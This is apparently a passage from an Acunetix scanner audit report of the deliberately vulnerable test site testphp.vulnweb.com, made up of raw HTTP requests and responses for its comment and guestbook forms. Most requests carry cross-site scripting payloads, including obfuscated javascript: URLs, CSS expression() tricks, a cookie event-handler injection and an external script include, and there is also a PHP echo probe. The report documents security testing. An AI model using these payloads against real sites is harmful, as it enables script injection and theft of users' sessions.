Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(550605971471)%3B&comment=111-222-1933email@address Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 135 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=S ubmit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=-->alert(550655971471)%3B&comment=111-222-1933email@addre ss.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response Acunetix Website Audit

23

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 167 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=email@somealert(550665971471)%3Bdomain.com&comment=111-22 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 158 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(550635971471)%3B&comment=111-222-1933ema [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

24

/comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 155 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(550645971471)%3B&comment=111-222-1933email@ address.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>">alert(550625971471)%3B&comment=111-222-1933email@addre ss.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request GET /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

25

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login="+onmouseover=alert(468455921020)+;mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 183 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20 message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 161 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

26

Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&text=111-222-1933email@addre ss.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

27

Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 103 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=<%00script>alert(468195920936)%3B[email protected]&submi t=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 139 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&text [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

28

/guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 125 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28468235920936%29%3B%22%3E&text=111-222-1933e [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request Acunetix Website Audit

29

POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 130 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00"'>alert(468605921095)%3B&text=111-222-1933email@addre ss.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Acunetix Website Audit

30

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=
alert(468575921095)%3B&text=111-222-1933email@addr Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 107 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&s ubmit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 121 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3C/xss/*-*/style=xss:e/**/xpression(alert(468885921227))%3E&text=111-222-1933email @address.tst&submit=add%20message Response Acunetix Website Audit

31

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 133 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&text=111-2 [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 134 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

32

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00'">alert(468595921095)%3B&text=111-222-1933email@addre ss.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 140 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name="+src="http://testphp.acunetix.com/xss.js?468555921095">&tex [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

33

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=-->alert(467935920806)%3B&text=111-222-1933email@address Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 129 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=email@somealert(467945920806)%3Bdomain.com&text=111-222-1 [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 132 Cookie: mycookie=3 Acunetix Website Audit

34

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28467965920806%29%3B%22%3E&text=111-2 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 117 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(467925920806)%3B&text=111-222-1933email@add ress.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>'>alert(467895920806)%3B&text=111-222-1933email@address. tst&submit=add%20message Acunetix Website Audit

35

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 120 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(467915920806)%3B&text=111-222-1933email@ address.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 97 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add% 20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

36

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>">alert(467905920806)%3B&text=111-222-1933email@address. tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 109 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(467885920806)%3B[email protected] &submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

37

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%00'">alert(469345921680)%3B&submit=add%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 113 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit =add%20message Response Acunetix Website Audit

39

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 127 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text="+src="http://testphp.acunetix.com/xss.js?46972 5922033">&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 120 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

40

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 100 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%3C/xss/*-*/style=xss:e/**/xpression(alert(469435921740))%3E&submit=a dd%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: 